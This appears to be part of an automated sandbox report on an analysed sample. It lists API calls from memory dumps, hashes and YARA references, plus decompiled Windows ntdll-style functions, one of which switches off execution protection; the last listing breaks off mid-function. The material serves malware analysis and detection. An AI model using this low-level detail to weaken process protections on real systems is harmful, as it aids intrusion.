                                                • Instruction Fuzzy Hash: ED01AFB2200108ABCB54CF89DD81EEB37AAAF8C354F158248FA0DE7255C630E851CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00098930, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098984
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: 1fd74cbbb40c3e4ab12df46f30a16c429b8e682a02be56e035a93056b8f56152
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: 2301AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97255C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00097400, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCE0,?,?), ref: 0009743C
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 51ba582e3e911b42fa11c135c165df8541740ea8ef473cff33f2ac28b774aa9f
                                                • Instruction ID: e030025f74a00630b08b58f9cebff5fdcf4642e4edde9a9282239687f491b349
                                                • Opcode Fuzzy Hash: 51ba582e3e911b42fa11c135c165df8541740ea8ef473cff33f2ac28b774aa9f
                                                • Instruction Fuzzy Hash: 94E06D333902043AE62065999C02FE7B29C8B81B20F150026FA0DEA2C2D995F80152A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00098A1D, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098A50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: ed37df251b98d60559eec580bf9713a21e71f203d7ee3a02d4262ca61647fb4a
                                                • Instruction ID: bfc525a52e53d967fef5a378d6de4c389f651f837a4cd16ce8e85acbdb7d6f26
                                                • Opcode Fuzzy Hash: ed37df251b98d60559eec580bf9713a21e71f203d7ee3a02d4262ca61647fb4a
                                                • Instruction Fuzzy Hash: 5AE01AB16002046BDB10DF99DC84FE737AAAF88350F118155BA0DAB251CA35E815CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00098A20, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098A50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 3d8cdf87c30b84d8b2e42dccf3f8830cb3c29f3efff65a99d061561c6976c6e6
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 1EE01AB12002086BDB10DF49CC85EE737ADAF88650F018154BA0857242C930E8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0008D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,00087C83,?), ref: 0008D44B
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                • Instruction ID: 5ee596a1bfbfaa077a92055b3d8a9dc3091a8f25d82d4e0fe3606be2394aea5d
                                                • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                • Instruction Fuzzy Hash: 8AD0A7717503043BEA10FAA49C07F6673CD6B44B00F494074F948D73C3D964F9004565
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00C98788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00C98788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00C98460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00C7E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00C9718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00C98460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00C9718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00C98460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00C98460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00C98460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00C9718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00C7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00C72340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00C8E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00C7E2A8(_t322,  &_v68, _v16);
								if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00C8E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00C7E2A8(_t322,  &_v68, _t236);
								if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00C9718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00C7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00C72340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00C8E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00C7E2A8(_v12,  &_v68, _v16);
							if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00C8E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00C7E2A8(_t322,  &_v68, _t269);
							if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00C9718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00C7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00C72340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00C8E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00C7E2A8(_v12,  &_v68, _v16);
						if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00C8E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00C7E2A8(_t322,  &_v68, _t296);
						if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                0x00c98788
                                                0x00c98788
                                                0x00c98791
                                                0x00c98794
                                                0x00c98798
                                                0x00c9879b
                                                0x00c9879e
                                                0x00c987a1
                                                0x00c987a4
                                                0x00c987a7
                                                0x00c987aa
                                                0x00c987af
                                                0x00ce1ad3
                                                0x00c98b0a
                                                0x00c98b0d
                                                0x00c98b13
                                                0x00c98b19
                                                0x00c98b1f
                                                0x00c98b25
                                                0x00c98b2b
                                                0x00c98b31
                                                0x00c98b37
                                                0x00c98b3d
                                                0x00c98b46
                                                0x00c98b46
                                                0x00c987c6
                                                0x00c987d0
                                                0x00ce1ae0
                                                0x00ce1ae6
                                                0x00ce1af8
                                                0x00ce1af8
                                                0x00ce1afd
                                                0x00ce1afe
                                                0x00ce1b01
                                                0x00ce1b06
                                                0x00ce1b06
                                                0x00c987d6
                                                0x00c987f2
                                                0x00c987f7
                                                0x00c98807
                                                0x00c9880a
                                                0x00c9880f
                                                0x00c98810
                                                0x00c98813
                                                0x00c98818
                                                0x00c98818
                                                0x00c9882c
                                                0x00c98831
                                                0x00c98838
                                                0x00c98908
                                                0x00c98920
                                                0x00c989f0
                                                0x00c98a08
                                                0x00c98af6
                                                0x00c98af6
                                                0x00c98af8
                                                0x00c98afb
                                                0x00ce1beb
                                                0x00ce1beb
                                                0x00c98b04
                                                0x00ce1bf8
                                                0x00ce1c0e
                                                0x00ce1c13
                                                0x00ce1c16
                                                0x00ce1c16
                                                0x00ce1bf8
                                                0x00000000
                                                0x00c98b04
                                                0x00c98a0e
                                                0x00c98a11
                                                0x00c98a14
                                                0x00c98a15
                                                0x00c98a18
                                                0x00c98a22
                                                0x00c98b59
                                                0x00c98a28
                                                0x00c98a3c
                                                0x00c98a3c
                                                0x00c98a42
                                                0x00ce1bb0
                                                0x00ce1b11
                                                0x00ce1b11
                                                0x00000000
                                                0x00c98a48
                                                0x00c98a51
                                                0x00c98a5b
                                                0x00c98a5e
                                                0x00c98a61
                                                0x00c98a69
                                                0x00c98a69
                                                0x00c98a6d
                                                0x00000000
                                                0x00000000
                                                0x00c98a74
                                                0x00c98a7c
                                                0x00c98a7d
                                                0x00c98a91
                                                0x00c98a93
                                                0x00c98a93
                                                0x00c98a98
                                                0x00c98a9b
                                                0x00c98aa1
                                                0x00c98aa1
                                                0x00c98aa4
                                                0x00c98aaa
                                                0x00c98ab1
                                                0x00c98ac5
                                                0x00c98ac7
                                                0x00c98ac7
                                                0x00c98ac5
                                                0x00c98ace
                                                0x00ce1bc9
                                                0x00ce1bce
                                                0x00ce1bd2
                                                0x00ce1bd2
                                                0x00c98ad8
                                                0x00c98aeb
                                                0x00c98aeb
                                                0x00c98af0
                                                0x00c98af4
                                                0x00000000
                                                0x00c98af4
                                                0x00c98a42
                                                0x00c98926
                                                0x00c98929
                                                0x00c9892c
                                                0x00c9892d
                                                0x00c98930
                                                0x00c98935
                                                0x00c9893a
                                                0x00c98b51
                                                0x00c98940
                                                0x00c98954
                                                0x00c98954
                                                0x00c9895a
                                                0x00ce1b63
                                                0x00000000
                                                0x00c98960
                                                0x00c98969
                                                0x00c98973
                                                0x00c98976
                                                0x00c98979
                                                0x00c9897e
                                                0x00c98981
                                                0x00c98981
                                                0x00c98986
                                                0x00000000
                                                0x00000000
                                                0x00ce1b6e
                                                0x00ce1b74
                                                0x00ce1b7b
                                                0x00ce1b8f
                                                0x00ce1b91
                                                0x00ce1b91
                                                0x00ce1b99
                                                0x00ce1b9c
                                                0x00ce1ba2
                                                0x00ce1ba2
                                                0x00c9898c
                                                0x00c98992
                                                0x00c98999
                                                0x00c989ad
                                                0x00ce1ba8
                                                0x00ce1ba8
                                                0x00c989ad
                                                0x00c989b6
                                                0x00c989c8
                                                0x00c989cd
                                                0x00c989d0
                                                0x00c989d0
                                                0x00c989d6
                                                0x00c989e8
                                                0x00c989e8
                                                0x00c989ed
                                                0x00000000
                                                0x00c989ed
                                                0x00c9895a
                                                0x00c9883e
                                                0x00c98841
                                                0x00c98844
                                                0x00c98845
                                                0x00c98848
                                                0x00c9884d
                                                0x00c98852
                                                0x00c98b49
                                                0x00c98858
                                                0x00c9886c
                                                0x00c9886c
                                                0x00c98872
                                                0x00ce1b0e
                                                0x00000000
                                                0x00c98878
                                                0x00c98881
                                                0x00c9888b
                                                0x00c9888e
                                                0x00c98891
                                                0x00c98896
                                                0x00c98899
                                                0x00c98899
                                                0x00c9889e
                                                0x00000000
                                                0x00000000
                                                0x00ce1b21
                                                0x00ce1b27
                                                0x00ce1b2e
                                                0x00ce1b42
                                                0x00ce1b44
                                                0x00ce1b44
                                                0x00ce1b4c
                                                0x00ce1b4f
                                                0x00ce1b55
                                                0x00ce1b55
                                                0x00c988a4
                                                0x00c988aa
                                                0x00c988b1
                                                0x00c988c5
                                                0x00ce1b5b
                                                0x00ce1b5b
                                                0x00c988c5
                                                0x00c988ce
                                                0x00c988e0
                                                0x00c988e5
                                                0x00c988e8
                                                0x00c988e8
                                                0x00c988ee
                                                0x00c98900
                                                0x00c98900
                                                0x00c98905
                                                0x00000000
                                                0x00c98905

                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-SKU, xrefs: 00C989FC
                                                • Kernel-MUI-Number-Allowed, xrefs: 00C987E6
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00C98914
                                                • Kernel-MUI-Language-Allowed, xrefs: 00C98827
                                                • WindowsExcludedProcs, xrefs: 00C987C1
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: 92ae9d558649d26819e5a1af587f21dbca26ca0887e974d83a4ff06cc437dd9a
                                                • Instruction ID: 164c4ce7090313937c86209e8d2af80430f206cbea63af8d44def1f844a52f60
                                                • Opcode Fuzzy Hash: 92ae9d558649d26819e5a1af587f21dbca26ca0887e974d83a4ff06cc437dd9a
                                                • Instruction Fuzzy Hash: 14F118B2D00249EFCF11EF95C985DEEB7B8FF08300F1584AAE515A7211EB349A55EB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00CA7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E00CA7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xd52088; // 0x768113a1
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00CA7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00CC3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00C7DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xd54218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00CC3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00C80D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00CC3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00C88375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00CC3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00CEE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00CC3F92();
					_t38 = 1;
					L2:
					return E00C7E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                0x00ca7f08
                                                0x00ca7f0f
                                                0x00ca7f12
                                                0x00ca7f1b
                                                0x00ca7f31
                                                0x00cc3ead
                                                0x00cc3eb4
                                                0x00000000
                                                0x00000000
                                                0x00cc3eba
                                                0x00cc3ecd
                                                0x00cc3ed2
                                                0x00cc3ee1
                                                0x00cc3ee7
                                                0x00cc3eec
                                                0x00cc3f12
                                                0x00cc3f18
                                                0x00cc3f1a
                                                0x00000000
                                                0x00000000
                                                0x00cc3f20
                                                0x00cc3f26
                                                0x00cc3f28
                                                0x00000000
                                                0x00000000
                                                0x00cc3f2e
                                                0x00cc3f30
                                                0x00000000
                                                0x00000000
                                                0x00cc3f3a
                                                0x00cc3f3b
                                                0x00cc3f53
                                                0x00cc3f64
                                                0x00cc3f69
                                                0x00cc3f6c
                                                0x00cc3f6d
                                                0x00cc3f6f
                                                0x00cce304
                                                0x00cce30f
                                                0x00cce315
                                                0x00cce31e
                                                0x00cce321
                                                0x00cce327
                                                0x00cce329
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00cce32f
                                                0x00cce32f
                                                0x00cce337
                                                0x00cce33a
                                                0x00cce33b
                                                0x00cce33d
                                                0x00cce33f
                                                0x00cce341
                                                0x00cce341
                                                0x00cce34e
                                                0x00cce353
                                                0x00cce358
                                                0x00cce35d
                                                0x00cce35f
                                                0x00000000
                                                0x00000000
                                                0x00cce365
                                                0x00cce365
                                                0x00cce368
                                                0x00cce36e
                                                0x00000000
                                                0x00000000
                                                0x00cce374
                                                0x00cce32f
                                                0x00cc3f75
                                                0x00cc3f7a
                                                0x00cc3f7c
                                                0x00cc3f7e
                                                0x00cc3f86
                                                0x00ca7f39
                                                0x00ca7f47
                                                0x00ca7f47
                                                0x00ca7f37
                                                0x00ca7f37
                                                0x00000000

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00CC3F12
                                                Strings
                                                • Execute=1, xrefs: 00CC3F5E
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00CC3F75
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 00CCE345
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00CC3EC4
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00CCE2FB
                                                • ExecuteOptions, xrefs: 00CC3F04
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00CC3F4A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: 591aaece4408b8663c241e0710175165dff27d2e243131ec532108941cedcab1
                                                • Instruction ID: 74e347c4f21dbda7ca3c3d929d696a679d9dad09f55cb3daadb4fa384db80c88
                                                • Opcode Fuzzy Hash: 591aaece4408b8663c241e0710175165dff27d2e243131ec532108941cedcab1
                                                • Instruction Fuzzy Hash: 5D411732A8030D7ADF20AAD4DCC6FEA73BCAF15704F0045ADF119E6081EA70AB459B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C953A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 44%
                                                			E00C953A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
